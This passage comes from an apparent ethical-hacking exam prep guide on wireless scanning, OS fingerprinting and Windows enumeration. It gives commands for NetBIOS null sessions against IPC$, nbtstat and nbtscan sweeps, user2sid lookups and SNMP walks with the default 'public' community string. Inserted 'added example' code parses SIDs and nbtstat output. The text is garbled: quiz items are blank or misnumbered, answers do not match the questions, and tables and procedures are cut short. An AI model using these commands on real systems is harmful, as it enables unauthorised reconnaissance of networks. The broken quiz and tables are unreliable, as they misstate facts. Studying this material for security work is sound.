Since wireless access points may proliferate as much as modems, the unsecured wireless access
points can be a danger to organizations because they offer the attacker a route into the network
around the company's firewall.
Wireless Scanners
A bunch of wireless scanning tools have been popping up recently, and many of them are free. Some
of these are:
NetStumbler. NetStumbler displays wireless access points, SSIDs, channels, whether WEP
encryption is enabled, and signal strength. NetStumbler can connect with GPS technology to log
accurately the precise location of access points.
AirSnort. AirSnort is a wireless LAN (WLAN) tool that cracks WEP encryption keys. AirSnort
passively monitors wireless transmissions and automatically computes the encryption key when
enough packets have been gathered.
Kismet. Kismet is an 802.11 wireless network detector, sniffer, and intrusion detection system.
Kismet identifies networks by passively collecting packets and detecting standard named
networks, detects (and given time, decloaks) hidden networks, and infers the presence of
nonbeaconing networks via data traffic.
SSID Sniff. A tool to use when looking to discover access points and save captured traffic, Sniff
comes with a configured script and supports Cisco Aironet and random prism2-based cards.
WifiScanner. WifiScanner analyzes traffic and detects 802.11b stations and access points. It can
listen alternatively on all 14 channels, write packet information in real time, and search access
points and associated client stations. All network traffic may be saved in the libpcap format for
post analysis.
AirMagnet. AirMagnet is a wireless tool originally created for WLAN inventory, but it has
developed into a useful wireless security assessment utility.
AiroPeek. WildPackets AiroPeek is a packet analyzer for IEEE 802.11b wireless LANs,
supporting all higher-level network protocols such as TCP/IP, AppleTalk, NetBEUI, and IPX.
AiroPeek is used to isolate security problems by decoding 802.11b WLAN protocols and by
analyzing wireless network performance with an identification of signal strength, channel, and
data rates.
Sniffer Wireless. McAfee Sniffer Wireless is a packet analyzer for managing network
applications and deployments on Wireless LAN 802.11a and 802.11b networks. It has the ability
to decrypt Wired Equivalent Privacy (WEP)-based traffic.
Fingerprinting
At this point, the attacker has gathered a lot of information but needs to know more about the
operating system of the target. Fingerprinting is a process to determine the operating system on the
target computer. One advantage of fingerprinting over some of the more robust scanning techniques
is that it's less detectable. Anytime the reconnaissance is less noticeable, the greater the chances are
that it will succeed.
Fingerprinting exploits the fact that various operating system vendors implement the TCP stack
differently. Uniquely built packets are sent to the target host, and the response is logged. This
response is then compared with a database to aid in determining the target's operating system.
There are two ways an attacker can implement fingerprinting: active and passive.
Passive Fingerprinting
Passive fingerprinting is less accurate than active fingerprinting but is less detectable by intrusion
detection systems. Like active fingerprinting, passive fingerprinting is also based on the different way
the TCP stack is implemented by different operating systems and comparing those differences.
Instead of relying on scanning the target host, passive fingerprinting captures packets from the target
host (sniffing) and examines them for specific operating system identifiers.
TTL is useful not only for determining that a machine is live but also for determining the operating
system running on that machine. Table 5-3 shows some common Time To Live values. Remember
that the TTL will decrement each time the packet passes through a router. This means that the TTL of
a router 6 hops away (as determined by traceroute) will be 249 (255 - 6).
Table 5-3: Time To Live (TTL) Values
TIME TO LIVE
255
128
60
32
Looking at the TTL is not a 100 percent accurate method of determining the OS and works better for
some operating systems than for others. Other TCP signatures provide clues to the type of OS
running on a target machine.
Many different identifiers can be used to fingerprint the OS, but the four TCP stack elements that are
most commonly examined are:
TTL. Various operating systems set the Time To Live value differently.
Initial TCP Window Size. Different operating systems use different values for the initial window
size.
Don't Fragment (DF) bit. Not all operating systems handle fragmentation in the same way.
Type of Service (TOS). A three-bit field that controls the priority of specific packets
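The TTL arithmetic above (249 observed, so 255 initial and 6 hops) and the four stack elements just listed are enough to build a small passive fingerprinter. The following Python is an added example, not code from the CEH Prep Guide or from P0f: it infers the initial TTL and hop count from an observed TTL, then scores a captured packet's (initial TTL, window size, DF, TOS) tuple against a signature table. The signature table, the packet captures and the OS labels are constructed for illustration and are not a real fingerprint database; the initial-TTL set extends the text's Table 5-3 values (255, 128, 60, 32) with 64, which is an assumption added here because many Unix-like stacks use it.

```python
"""Passive OS fingerprinting heuristics from TTL, window size, DF bit and TOS.

Added example (not from the CEH Prep Guide, not P0f). The signature table and
the captured packets are constructed for illustration.
"""

# Initial TTLs: the text's Table 5-3 values plus 64 (assumed, common on Unix-like stacks).
INITIAL_TTLS = (32, 60, 64, 128, 255)


def initial_ttl_and_hops(observed_ttl: int):
    """Guess the sender's initial TTL (smallest common value >= observed) and the
    number of routers crossed: 249 -> (255, 6), matching the text's example."""
    if not 0 < observed_ttl <= 255:
        raise ValueError("TTL must be 1..255")
    for start in INITIAL_TTLS:
        if start >= observed_ttl:
            return start, start - observed_ttl
    return 255, 255 - observed_ttl   # not reachable with the table above; kept for safety


# Constructed signatures: (initial TTL, window size, DF bit, TOS) -> label.
SIGNATURES = {
    (128, 65535, True, 0): "Windows-like",
    (64, 5840, True, 0): "Linux-like",
    (255, 8760, True, 0): "Solaris-like",
    (64, 65535, True, 16): "BSD-like",
}


def fingerprint(packet: dict) -> dict:
    """Score the packet's fields against every signature; fields: ttl, window, df, tos.
    A guess needs at least two matching fields, otherwise the result is 'unknown'."""
    init_ttl, hops = initial_ttl_and_hops(packet["ttl"])
    observed = (init_ttl, packet["window"], packet["df"], packet["tos"])
    best, best_score = "unknown", 0
    for sig, label in SIGNATURES.items():
        score = sum(1 for a, b in zip(sig, observed) if a == b)
        if score > best_score:
            best, best_score = label, score
    if best_score < 2:
        best = "unknown"
    return {"guess": best, "confidence": best_score / 4,
            "initial_ttl": init_ttl, "hops": hops}


# Constructed captures: a Windows-style SYN six hops away and a Linux-style one three hops away.
CAPTURES = [
    {"src": "192.0.2.10", "ttl": 122, "window": 65535, "df": True, "tos": 0},
    {"src": "192.0.2.20", "ttl": 61, "window": 5840, "df": True, "tos": 0},
]

if __name__ == "__main__":
    for pkt in CAPTURES:
        print(pkt["src"], fingerprint(pkt))
```

One caveat the table makes visible: because 60 and 64 are both plausible initial TTLs, an observed TTL of 58 is ambiguous (60 with 2 hops or 64 with 6 hops), and this code simply picks the smaller. That is one reason the text calls TTL alone not a 100 percent accurate method and pairs it with the other stack fields.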
Active Fingerprinting
Active fingerprinting is more accurate than passive, but it's not as stealthy. It's similar to passive
fingerprinting, in that active fingerprinting also looks for variations in the implementation of the TCP/IP
stack. Since it involves actually sending altered packets, rather than just passively sniffing packets, it
is more powerful, accurate, and detectable.
An excellent passive fingerprinting tool is P0f. It can be found at http://lcamtuf.coredump.cx/p0f.shtml.
Some of the scanning methods employed in active fingerprinting (such as the FIN probe, TCP initial
window size, TOS, fragmented packet handling, and initial sequence number sampling) have been
mentioned earlier in the passive fingerprinting and the port scanning sections. Other methods include
examining the ACK value, sampling the IPID value, or sending a bogus flag probe.
Several tools exist that support active fingerprinting, including the ubiquitous NMap, Xprobe
(http://xprobe.sourceforge.net/), and Winfingerprint (http://winfingerprint.com/index.php).
Network info. Public domain name information; DNS servers; IP addressing scheme and IPs in
use; types of operating systems in use; running machines and services; open ports; WLAN
access points; and modem and fax lines open.
Company info. Company and branch locations; public phone numbers and email addresses;
merger and acquisition information; public financial records; and some individual employee
information.
Assessment Questions
Answers to these questions can be found in Appendix A.
1.
2.
4.
Which choice is not a common technique used to identify open ports and services?
a. Banner grabbing
b. War dialing
c. UrlScan
d. Port scanning
5.
6.
Which choice is not a reason to want to know what services are running or listening on the
target?
a. To identify potential ports for creating attack vectors
b. To lessen the chances of being detected
c. To get operating system information
d. To identify specific applications
7.
What response do you get from ping if the target isn't live?
a. Ping returns an ICMP Echo Reply message.
b. Ping returns a TCP Echo Request packet.
c. Ping returns an ICMP Echo Request packet.
d. Ping returns a Request timed out message.
8.
How many total TCP and UDP port numbers are there?
a. 1024
b. 8984
c. 16,664
d. 65,535
9.
Besides TTL, which choice is not a TCP signature that helps identify the target's OS?
a. Don't Fragment (DF) bit
b. WebDAV
c. Type of Service (TOS)
d. Initial Window Size
c. NLog
d. NetCat
13. Which choice is not a common war dialer tool?
a. ToneLoc
b. Telnet
c. THC-Scan
d. PhoneSweep
14. Which choice is the best description of war driving?
a. A traveling hacker sniffing for WLANs
b. Scanning a pool of telephone numbers to detect vulnerable modems
c. Blocking specific HTTP requests to IIS
d. Banner grabbing with Telnet
15. Which choice is not part of the scanning phase?
a. Port scanning individual systems
b. Fingerprinting the operating system
c. Reviewing the target's annual report
d. Uncovering services on ports
16. Which choice is not a common wireless scanning tool?
a. NetStumbler
b. Kismet
c. AirSnort
d. NetCat
17. Which choice is the best description of the goal of fingerprinting?
a. To determine the target's operating system
b. To compile a list of company branches
c. To scan telephone numbers to detect modems
d. To prevent false positives
18. Which is the best choice to describe the difference between active and passive
fingerprinting?
a. Active fingerprinting is less accurate.
b. Active fingerprinting is less detectable.
c. Passive fingerprinting is more detectable.
d. Passive fingerprinting is less detectable.
19. Which is not one of the three states of a port?
a. Open
b. Filtered
c. Half-open
d. Closed
20. Which choice is not a reason to try to detect active machines on the target network?
a. To identify the perimeter of the target's network
b. To compile a list of employee phone numbers
c. To create an inventory of which networked systems are accessible on the target
d. To fill in accurate details in the network map you're creating
Answers
1.
Answer: c
The TTL (Time To Live) value is useful not only for determining that a machine is live, and how
many router hops away from the source, but also for determining the targets operating system
type.
2.
Answer: d
Although the tester is still in info gathering mode, scanning is more active than footprinting, and
here the tester begins to get a more detailed picture of the target, by:
Detecting live machines on the target network
Discovering services running on targeted servers
Identifying which TCP and UDP services are running
Identifying the operating system
Using active and passive fingerprinting
3.
Answer: d
4.
Answer: c
5.
Answer: a
Ping sends out an ICMP Echo Request packet and awaits an ICMP Echo Reply message from an
active machine.
6.
Answer: b
The reasons we want to know what services are running or listening on the target are several:
To determine live hosts in the event ICMP is blocked
To identify potential ports for creating attack vectors
To get operating system information
To identify specific applications
7.
Answer: d
If the target isn't up and running, ping returns a Request timed out message.
8.
Answer: d
A computer has available a total of 65,535 TCP and 65,535 UDP port numbers used to identify a
specific process that is communicating to other processes.
9.
Answer: b
TCP signatures used to determine the target's OS are:
Initial Window Size. What the operating system sets the Window Size at.
Don't Fragment (DF) bit. Does the operating system set the Don't Fragment bit?
Type of Service (TOS). Does the operating system set the Type of Service, and if so, at
what?
WebDAV stands for Web-based Distributed Authoring and Versioning, and is an HTML
extension.
10. Answer: a
The first 1,024 ports are called the well-known ports, because most standard services and
applications run in this area.
11. Answer: d
Some common issues a scanner needs to be aware of are false positives, heavy traffic and false
negatives resulting from the scan.
12. Answer: c
Chapter 6: Enumerating
Overview
The enumerating phase is the final preattack phase, in which the hacker looks for user account
information, system groups and roles, passwords, and unprotected shares. To understand properly
the enumeration process, we need to look at various elements of Windows architecture and security.
The topics we cover in this chapter are:
Protection rings
Windows architecture
Windows security architecture
Windows enumeration techniques
SNMP enumeration
DNS zone transfer
Active Directory enumeration
Enumeration countermeasures
Protection Rings
In a computational system, multiple processes might be running concurrently. Each process has the
capability to access certain memory locations and to execute a subset of the computer's instruction
set. The execution and memory space assigned to each process is called a protection domain.
This domain can be extended to virtual memory, which increases the apparent size of real memory by
using disk storage. The purpose of establishing a protection domain is to protect programs from all
unauthorized modification or executional interference.
One scheme that supports multiple protection domains is the use of protection rings. These rings are
organized with the most privileged domain located in the center of the ring and the least-privileged
domain in the outermost ring. This approach is shown in Figure 6-1.
Windows Architecture
Before we examine Windows enumeration techniques, you need to have a basic understanding of
Windows architecture.
Windows Vista, Windows Server 2003, Windows XP, Windows 2000, and Windows NT are all part of
the Windows NT family of Microsoft operating systems. Each of these operating systems shares a
similar kernel, which is important for a hacker, as the kernel is the most trusted part of the operating
system.
Windows NT architecture consists of two main layers, a user mode and a kernel mode, and several
layers of modules within these two main layers. Windows implements a distinct protection ring for
each of these two layers. The user mode operates in ring 3, and kernel mode operates in ring 0.
Programs and subsystems in user mode have access to a limited number of system resources, while
kernel mode has unrestricted access to all resources including system memory and external devices.
This distinction of user mode versus kernel mode is important, as attack tools operating in user mode
can more easily be detected by antiattack programs. If attack programs can be made to run in kernel
mode on the target, however, the attack can hide from detection and be harder to remove.
User mode is made up of subsystems which can pass I/O requests to the appropriate kernel mode
drivers via the I/O manager (which exists in kernel mode). Applications run at a lower priority than
kernel mode processes.
Kernel mode has full access to the hardware and system resources of the computer and runs code in
a protected memory area. It controls access to scheduling, thread prioritization, memory
management, and interaction with hardware. Kernel mode stops user mode services and applications
from accessing critical areas of the operating system; user-mode processes requiring critical resources
must ask the kernel mode to perform operations on their behalf.
Also, the level of account to which a hacker can acquire access will determine the level at which he
can execute code on that system. Since the system account has the capability to run programs in the
kernel mode, obviously an attacker will attempt to acquire that account, to run his code at the highest
privilege level possible.
Figure 6-2 shows a graphical example of the Windows architecture, with the relationship of the user
mode to the kernel mode.
Security Identifiers (SIDs). SIDs identify user, group, and computer accounts. Every account on
a network is issued a unique SID when the account is first created. Internal processes in
Windows refer to an account's SID rather than the account's user or group name.
Relative Identifiers (RIDs). RIDs are a subset of the SID and identify a user or group in relation
to the authority that issued the SID.
The SRM is the authority that enforces the security rules and determines whether an object or
resource can be accessed. It refers to access control lists (ACLs), which are themselves made up of
access control entries (ACEs). The ACEs contain the SID and a list of operations that have
permission (allow, deny, or audit) to access that resource. The ACE gives permission to a select group
of trustees: a user account, group account, or logon session.
Universal, well-known SIDs identify generic groups and generic users. For example, the well-known
SID used to identify the Everyone group that includes all users is S-1-1-0. The S identifies the
string as an SID, the first 1 is the revision level of the SID, and the remaining two digits are the
SECURITY_WORLD_SID_AUTHORITY and SECURITY_WORLD_RID constants.
Table 6-1 shows some well-known SIDs.
Table 6-1: Well-Known Security Identifiers (SIDs)
UNIVERSAL WELL-KNOWN SID STRING VALUE    IDENTIFIES
S-1-0-0                                  Null SID
S-1-1-0                                  World
S-1-2-0                                  Local
S-1-3-0                                  Creator Owner ID
S-1-3-1                                  Creator Group ID
The RID starts at a fixed value and is incremented by one for each account created. SIDs are unique
unless you use cloning. If you clone a workstation, the user accounts on the two workstations will
have the same SIDs: the first user accounts will be identical, the second, and so on. In workgroup
environments, security is based on local account SIDs, giving the duplicate accounts (those sharing a
SID) identical access rights.
Since the administrator account is the account with RID=500, it cannot be obscured successfully.
Therefore, an attacker can find out which account is the administrator account, even if it has been
renamed, by the RID=500.
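The SID structure described above (S, revision, identifier authority, sub-authorities, RID) and the fixed RID 500 of the built-in Administrator account can be checked mechanically, which is how an administrator audits whether renaming the account has achieved anything. The following Python is an added example, not code from the CEH Prep Guide: it parses SID strings, labels the universal well-known SIDs from Table 6-1, and lists accounts whose RID is 500 under a different name. The account list and the domain sub-authority values are constructed; RID 501 for Guest is a standard Windows value added here, not one the text gives.

```python
"""Parse Windows SID strings and audit accounts by RID.

Added example (not from the CEH Prep Guide); the account list is constructed.
"""
import re

# Universal well-known SIDs from Table 6-1 of the text.
WELL_KNOWN = {
    "S-1-0-0": "Null SID",
    "S-1-1-0": "World (Everyone)",
    "S-1-2-0": "Local",
    "S-1-3-0": "Creator Owner ID",
    "S-1-3-1": "Creator Group ID",
}

# Fixed RIDs: 500 is Administrator (from the text); 501 is Guest (standard Windows value).
FIXED_RIDS = {500: "Administrator", 501: "Guest"}

# S-<revision>-<identifier authority>-<sub-authority>[-<sub-authority>...]
_SID_RE = re.compile(r"^S-(\d+)-(\d+)((?:-\d+)+)$")


def parse_sid(sid: str) -> dict:
    """Split 'S-1-5-21-...-500' into revision, authority, sub-authorities and RID
    (the last sub-authority is the RID, relative to the issuing authority)."""
    m = _SID_RE.match(sid)
    if not m:
        raise ValueError(f"not a SID string: {sid!r}")
    revision, authority = int(m.group(1)), int(m.group(2))
    subs = [int(x) for x in m.group(3).split("-")[1:]]
    return {"revision": revision, "authority": authority,
            "sub_authorities": subs[:-1], "rid": subs[-1]}


def describe_sid(sid: str) -> str:
    """Name a well-known SID, or classify a domain/local account SID by its RID.
    Authority 5 with first sub-authority 21 is the NT authority's machine/domain SID."""
    if sid in WELL_KNOWN:
        return WELL_KNOWN[sid]
    p = parse_sid(sid)
    if p["authority"] == 5 and p["sub_authorities"][:1] == [21]:
        role = FIXED_RIDS.get(p["rid"], "user or group")
        return f"{role} (RID {p['rid']})"
    return "unrecognised"


def find_renamed_admins(accounts):
    """Return names of accounts whose SID ends in RID 500 but are not called
    Administrator: renaming does not hide the built-in account, as the text notes."""
    return [name for name, sid in accounts
            if parse_sid(sid)["rid"] == 500 and name.lower() != "administrator"]


def duplicate_sids(accounts_by_host):
    """Return SIDs that appear on more than one host, the symptom of cloned
    workstations described in the text. accounts_by_host: {host: [(name, sid), ...]}."""
    seen = {}
    for host, accounts in accounts_by_host.items():
        for _, sid in accounts:
            seen.setdefault(sid, set()).add(host)
    return {sid: sorted(hosts) for sid, hosts in seen.items() if len(hosts) > 1}


# Constructed accounts; the domain sub-authorities are made-up values.
ACCOUNTS = [
    ("svc_backup", "S-1-5-21-1004336348-1177238915-682003330-1000"),
    ("helpdesk",   "S-1-5-21-1004336348-1177238915-682003330-500"),
    ("Guest",      "S-1-5-21-1004336348-1177238915-682003330-501"),
]

if __name__ == "__main__":
    for name, sid in ACCOUNTS:
        print(f"{name:12} {sid}  {describe_sid(sid)}")
    print("renamed Administrator accounts:", find_renamed_admins(ACCOUNTS))
```

Because the RID is the only part that distinguishes accounts issued by the same authority, a defender reading an audit list should treat the RID, not the display name, as the identity of the account.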
Some universal RID codes and their related accounts are:
SAM Database
The SAM database is a very important part of Windows security. SAM provides a simple form of name
resolution, minimal transactions, replication, and secure storage for the security database.
SAM manages security principal accounts. It uses Active Directory for storage of these accounts on a
domain controller, and it uses the SAM database in the registry on workstations, stand-alone servers,
and member servers. It is stored in a protected area of the registry of HKLM\SAM.
In the Windows NT environment, both domain controllers and workstations store security principal
accounts in the SAM database, which uses the registry as its underlying persistent storage.
Starting with Windows 2000, domain security principal accounts are stored in Active Directory instead
of the registry. Although security accounts are stored in Active Directory, SAM exists on Windows
2000 domain controllers to ensure compatibility with those domains and applications that depend on
it. SAM also is used by Windows 2000-based computers that are not domain controllers for local
account storage.
A domain in SAM can refer either to all of the accounts on a single computer or all of the accounts in a
Windows NETBIOS domain.
The Builtin container houses default local group accounts (such as Administrators and Users) that are
installed whenever a new workstation, server, or domain controller is set up. It provides some basic
account types, such as Administrator and Guest, that give the operator sufficient capability to add
further accounts to the computer or domain.
The Builtin container account SIDs are the same on every Windows 2000 or earlier system. These
fixed SIDs allow the predefined groups to be placed in access control lists without regard to the
domain of the system. For this reason, the objects in the Builtin container cannot be changed.
In Windows 2000, domains contain the same objects as in Windows NT 4.0, as well as several
additional properties on certain objects.
On April 30, 2004, the Sasser worm exploited a vulnerability in LSASS to spread via a remote buffer
overflow in computers running Microsoft Windows XP and Windows 2000. The worm is still alive and
is particularly potent in that it can spread without any interaction with humans; nor does it travel by
email like many other worms. It spreads by scanning randomly selected IP addresses for vulnerable
systems.
The WinLogon service starts the LSASS, to which it's directed by the Registry value
HKLM\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\System. LSASS then
checks for what security DLLs it should load and how to read policy, account, group, and password
information from the SAM and SECURITY Registry hives. Table 6-2 lists the ports commonly
accessed by the Local Security Authority.
Table 6-2: LSA Ports
APPLICATION PROTOCOL    PROTOCOL    PORTS
                        TCP         3269
                        TCP         3268
LDAP Server             TCP         389
LDAP Server             UDP         389
LDAP SSL                TCP         636
LDAP SSL                UDP         636
IPSec ISAKMP            UDP         500
NAT-T                   UDP         4500
RPC                     TCP         135
                        TCP         1024-65536
NetBIOS
Microsoft's Network Basic Input/Output System (NetBIOS) is a standard interface between networks
and PCs that enables applications on different computers to communicate within a LAN. NetBIOS was
created by IBM for its early PC network, was adopted by Microsoft and adapted to run over TCP/IP,
and has since become a de facto industry standard.
NetBIOS is not natively routable across a Wide Area Network (WAN) and is therefore used primarily
on Local Area Networks (LANs). NetBIOS systems identify themselves with a 15-character unique
name and use Server Message Blocks (SMB), which allow remote directory, file, and printer sharing.
This feature makes NetBIOS a hacker's playground.
The NetBIOS Name Resolution service listens on UDP port 137; when it receives a query on this port,
it responds with a list of all services it offers. Table 6-3 shows the three primary ports NetBIOS uses.
Table 6-3: NetBIOS Ports
PROTOCOL    PORTS
UDP         138
UDP         137
TCP         139
NetBIOS Enumerating
The NetBIOS null session is often referred to as the Holy Grail of Windows hacking. Null sessions
take advantage of flaws in the Common Internet File System/Server Message Block (CIFS/SMB).
Anyone with a NetBIOS connection to your computer can easily get a full dump of all your usernames,
groups, shares, permissions, policies, services, and more using the null user.
The hacker can establish a null session with a Windows host by logging on with a null user name and
password. Using these null connections allows the hacker to gather information from the host such as:
List of users and groups
List of machines
List of shares
User and host Security Identifiers (SIDs)
Net View
Insecure protocols such as Server Message Block (SMB) and Inter-Process Communication (IPC)
were created back in the day when security was not such a big deal. It should have been, but it
wasn't. As a result, there's a lot of information the attacker can get from using the net command.
Typing net /? will bring up a list of options; let's look at the net view command.
If you've found NetBIOS activity, you can use the net view command to unearth a lot more info.
First, type net view /domain to get a list of domains:
C:\>net view /domain
Domain
Boston
Chicago
New York
The command completed successfully
Now that you've found some groups, drill down further and look at one of them:
C:\>net view /domain:Boston
Server Name        Remark
\\Cranberry
\\Elvis
\\Big Dig
The command completed successfully
Next, try to find unprotected shares on one of the systems:
C:\>net view \\Cranberry
Shared Resources at \\Cranberry
Sharename    Type    Comment
CDRW         Disk
PDFFact2     Disk
Now, create a null connection. The following syntax connects to the hidden Inter-Process
Communication 'share' (IPC$) at a target IP address (10.1.1.1 in the example below) with the
built-in anonymous user (/u:"") and the ("") null password:
C:\>net use \\<IP addr>\IPC$ "" /u:""
or
C:\>net use \\<IP addr>\IPC$ "" /user:""
For example, to create a null session on a PC with the IP address 10.1.1.1, type this on the command
line:
C:\>net use \\10.1.1.1\IPC$ "" /u:""
NBTSTAT
Windows ships with a standard tool, NBTSTAT, which queries a single IP address when given the -A
parameter. When run on a machine on the local network, it returns:
C:\>NBTSTAT -A 10.1.1.1
NetBIOS Remote Machine Name Table
   Name               Type         Status
---------------------------------------------
THE-02147C896CB<00>  UNIQUE      Registered
THE-02147C896CB<20>  UNIQUE      Registered
WORKGROUP      <00>  GROUP       Registered
WORKGROUP      <1E>  GROUP       Registered
THE-02147C896CB<03>  UNIQUE      Registered
WORKGROUP      <1D>  UNIQUE      Registered
..__MSBROWSE__.<01>  GROUP       Registered
ADMINISTRATOR  <03>  UNIQUE      Registered
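Added example, not part of the book: a Go parser for NBTSTAT -A output that labels each suffix/type pair with the service that registered it (Microsoft's documented NetBIOS name suffixes, which the text does not list) and summarises what the table tells a defender about the host, such as whether file sharing is on and which user is logged on. The sample table is a constructed copy of the one above.

```go
package main

import (
	"bufio"
	"fmt"
	"regexp"
	"strings"
)

// NBTEntry is one row of the name table that NBTSTAT -A prints.
type NBTEntry struct {
	Name   string
	Suffix string // the two hex digits shown in <..>
	Type   string // UNIQUE or GROUP
	Status string
}

// sampleNbtstat is a constructed copy of the THE-02147C896CB table in the text.
const sampleNbtstat = `
   Name               Type         Status
---------------------------------------------
THE-02147C896CB<00>  UNIQUE      Registered
THE-02147C896CB<20>  UNIQUE      Registered
WORKGROUP      <00>  GROUP       Registered
WORKGROUP      <1E>  GROUP       Registered
THE-02147C896CB<03>  UNIQUE      Registered
WORKGROUP      <1D>  UNIQUE      Registered
..__MSBROWSE__.<01>  GROUP       Registered
ADMINISTRATOR  <03>  UNIQUE      Registered
`

// rowRe matches a name-table row; header and separator lines have no <..> and are skipped.
var rowRe = regexp.MustCompile(`^\s*(.+?)\s*<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\S+)`)

// ParseNbtstat extracts the registered names from NBTSTAT -A output.
func ParseNbtstat(output string) []NBTEntry {
	var entries []NBTEntry
	sc := bufio.NewScanner(strings.NewReader(output))
	for sc.Scan() {
		if m := rowRe.FindStringSubmatch(sc.Text()); m != nil {
			entries = append(entries, NBTEntry{Name: m[1], Suffix: strings.ToUpper(m[2]), Type: m[3], Status: m[4]})
		}
	}
	return entries
}

// suffixMeaning maps suffix/type pairs to the service that registers them
// (Microsoft's documented NetBIOS name suffixes; not listed in the text).
var suffixMeaning = map[string]string{
	"00/UNIQUE": "Workstation service (computer name)",
	"00/GROUP":  "domain or workgroup name",
	"03/UNIQUE": "Messenger service (computer name or logged-on user)",
	"20/UNIQUE": "File Server service (shares offered)",
	"1D/UNIQUE": "Master Browser for this subnet",
	"1E/GROUP":  "browser service elections",
	"01/GROUP":  "master browser announcement (__MSBROWSE__)",
}

// Describe returns the service behind one entry.
func Describe(e NBTEntry) string {
	if m, ok := suffixMeaning[e.Suffix+"/"+e.Type]; ok {
		return m
	}
	return "unrecognised suffix/type"
}

// Exposure is what the table tells a defender about the host.
type Exposure struct {
	Computer, Workgroup, LoggedOnUser string
	FileSharing, MasterBrowser        bool
}

// Summarize derives the exposure from the entries. A <03> UNIQUE name that is
// not the computer name is the Messenger registration of the logged-on user.
func Summarize(entries []NBTEntry) Exposure {
	var x Exposure
	for _, e := range entries {
		switch e.Suffix + "/" + e.Type {
		case "00/UNIQUE":
			x.Computer = e.Name
		case "00/GROUP":
			x.Workgroup = e.Name
		case "20/UNIQUE":
			x.FileSharing = true
		case "1D/UNIQUE":
			x.MasterBrowser = true
		}
	}
	for _, e := range entries {
		if e.Suffix == "03" && e.Type == "UNIQUE" && e.Name != x.Computer {
			x.LoggedOnUser = e.Name
		}
	}
	return x
}

func main() {
	entries := ParseNbtstat(sampleNbtstat)
	for _, e := range entries {
		fmt.Printf("%-16s <%s> %-6s %s\n", e.Name, e.Suffix, e.Type, Describe(e))
	}
	fmt.Printf("%+v\n", Summarize(entries))
}
```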
Nbtscan
Another program for scanning IP networks for NetBIOS name information is Nbtscan
(www.unixwiz.net/tools/nbtscan.html). For each host that responds to queries, Nbtscan lists IP
address, NetBIOS computer name, logged-in user name, and MAC address. For example, running
Nbtscan with a local IP and subnet mask returns:
C:\> nbtscan 192.168.1.0/24
192.168.1.3     MTNDEW\WINDEV     SHARING DC
192.168.1.5     MTNDEW\TESTING
192.168.1.9     MTNDEW\WIZ        SHARING U=STEVE
192.168.1.99    MTNDEW\XPDEV      SHARING
User2sid and Sid2user are two utilities for Windows NT, created by Evgenii Rudny, that allow the
administrator to query the SAM to find out a SID value for a given account name and vice versa.
User2sid.exe can retrieve a SID from the SAM (Security Accounts Manager) from the local or a
remote machine. Sid2user.exe can then be used to retrieve the names of all the user accounts and
more.
These utilities do not exploit a bug but call the functions LookupAccountName and
LookupAccountSid, respectively. These tools can be called against a remote machine without
providing logon credentials except those needed for a null session connection. They rely on the ability
to create a null session, like the earlier (IPC$) hack, in order to work.
For example, running user2sid.exe for the Everyone group, C:\>user2sid Everyone, gives you:
S-1-1-0
Number of subauthorities is 1
Domain is
Length of SID in memory is 12 bytes
Type of SID is SidTypeWellKnownGroup
Running the query against the Administrator account, C:\>user2sid Administrator, returns:
S-1-5-21-117609710-688789844-1957994488-500
Number of subauthorities is 5
Domain is THE-02147C896CB
Length of SID in memory is 28 bytes
Type of SID is SidTypeUser
So the entire procedure to get user SIDs from NetBIOS in our sample XYZ company is as follows:
1. nslookup www.xyz.com
   Non-authoritative answer:
   Name:    www.xyz.com
   Address: 131.107.2.200
Other Tools
Another NetBIOS exploiting tool is DumpSec (www.somarsoft.com/). DumpSec is a security auditing
program for Microsoft Windows NT/XP/200x. It dumps the permissions (DACLs) and audit settings
(SACLs) for the file system, registry, printers, and shares in a readable format, so that holes in system
security are readily apparent. DumpSec also dumps user, group, and replication information and
reveals shares over a null session with the target computer.
The NetBIOS Auditing Tool (NAT) (www.securityfocus.com/tools/543) is designed to explore the
NetBIOS file-sharing services offered by the target system. It implements a stepwise approach to
gathering information and attempts to obtain file system-level access as though it were a legitimate
local client.
If a NetBIOS session can be established at all via TCP port 139, the target is declared vulnerable.
Once the session is fully set up, the NAT collects more information about the server, including any file
system shares it offers.
SNMP Enumeration
The Simple Network Management Protocol (SNMP) is a network management TCP/IP protocol.
Widely implemented in Ethernet, it defines information transfer among management information
bases (MIBs). SNMP is used by network management systems to monitor network-attached devices
for conditions that warrant administrative attention. It consists of a set of standards for network
management, including an Application Layer protocol, a database schema, and a set of data objects.
SNMP is a pervasive tool. All operating systems have this capability in one form or another, including
network devices such as hubs, switches, and routers. The operation of SNMP is very simple: MIBs
send requests to agents, and the agents reply. These requests and replies refer to variables
accessible to agent software, and the MIBs can send requests to set specific values for certain
variables.
Predefined SNMP events that trigger a notification to the SNMP manager are called traps. After the
manager receives the event, the manager displays it and can choose to take an action based on the
event. For instance, the manager can poll the agent directly or poll other associated device agents to
get a better understanding of the event.
Events that trigger a trap could be a device reboot, a network interface failure, or other abnormal
event.
This simplicity and openness make SNMP an excellent vehicle for the hacker. Some SNMP
vulnerabilities are:
Insecure defaults. Many devices come configured with PUBLIC as the default SNMP community
string, which makes it easy for an attacker.
No SNMP community name. Some devices don't even have PUBLIC as a community name but
have no name defined at all, making an attack even easier.
Unauthorized write access. Often the Read-Write community is not controlled tightly, giving an
attacker the ability to alter the device.
Remote packet capturing. Some packet-capturing tools can be accessed over a network using
SNMP. An attacker from a remote location could be eavesdropping on network traffic, and
obtaining passwords, user identifications and other sensitive data.
SNMPutil
Enumerating NT users via SNMP is easy using SNMPutil. In an SNMP agent, parameters are
arranged in a tree. SNMP uses an Object Identifier (OID) to specify the exact parameter to set or get
in the tree. An OID consists of the object identifier for an object in an MIB and is a list of numbers
separated by periods.
SNMPUTIL.EXE is a command-line utility (included with the Windows NT 3.51 and 4.0 resource kits)
that allows the querying of MIB information from a network device. With the SNMPUTIL program, you
can access the SNMP OID and get the information you want from a command line.
SNMPutil is run in a command-line box from the %systemroot%\system32 directory. Returning a
value from the OID is hit or miss, as different systems use different values. Using 127.0.0.1 as the
target and a community name of PUBLIC, the following list shows some sample SNMPutil command
lines and OIDs:
Windows NT:
List all memory and processor OIDs: SNMPutil walk 127.0.0.1 public .1.3.6.1.4.1.311.1.1.3.1.1.1
List all network interface OIDs: SNMPutil walk 127.0.0.1 public .1.3.6.1.4.1.311.1.1.3.1.1.3
NetWare Servers:
Trap Receiver and Trap Generator (www.ncomtech.com). Two free Win32 GUI-based
